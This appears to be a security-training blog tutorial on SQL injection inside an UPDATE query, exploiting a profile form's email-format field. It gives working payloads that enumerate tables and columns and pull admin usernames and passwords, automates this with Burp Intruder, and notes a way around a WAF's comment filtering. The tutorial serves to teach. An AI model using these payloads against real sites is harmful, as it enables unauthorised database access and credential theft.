January 21, 2020

Tutorial: SQL injection inside UPDATE query

danielkhaoticen
Share
burp-suite

SQL injection inside UPDATE query [Tutorial]

This tutorial will help you with SQLi inside UPDATE query.  SQLi is located in profile settings.Picture of settings panel:[caption id="" align="aligncenter" width="217"] click image to enlarge[/caption]Vulnerable parameter is "E-mail format: " value.  We use Temper data to intercept and change values.Picture of intercepted values:

After we click "ok" we get this.Picture of MySQL error:

First we wan to find database version,but what would be the easiest way.We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe).Picture of version query:

Picture of rendered content with database answer:

Now that we know how to create our quer lets get tables.Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables query:

Picture of rendered content with database answer:

Three tables, strange!? Let's check that again. We use count.Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = 'Picture of get tables count query:

Picture of rendered content with database answer:

Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs.We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers"Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = 'Picture of burp settings:

[caption id="" align="aligncenter" width="320"]

click image to enlarge[/caption]

That's all, and now you just get columns the same way with Burp Suite.Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = 'Just increment n with Burp Suite.Values :Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = 'Just increment n with Burp Suite.That's it. Simple, yet effective.  I used this because, waf blocked -- and --+ so I wasn't able to close and comment out query.I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments :)

Start learning with Cybrary

Create a free account

Related Posts

All Blogs
Building a Security Team
June 27, 2023

Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It

A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.

Read More
Building a Security Team
June 28, 2023

How to Build a Red Team

An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.

Read More
Tools & Applications
June 7, 2023

How to Make the Most of Blending Learning with Cybrary Live

Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.

Read More
News & Events
June 7, 2023

Introducing the New Cybrary Learner Experience

Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.

Read More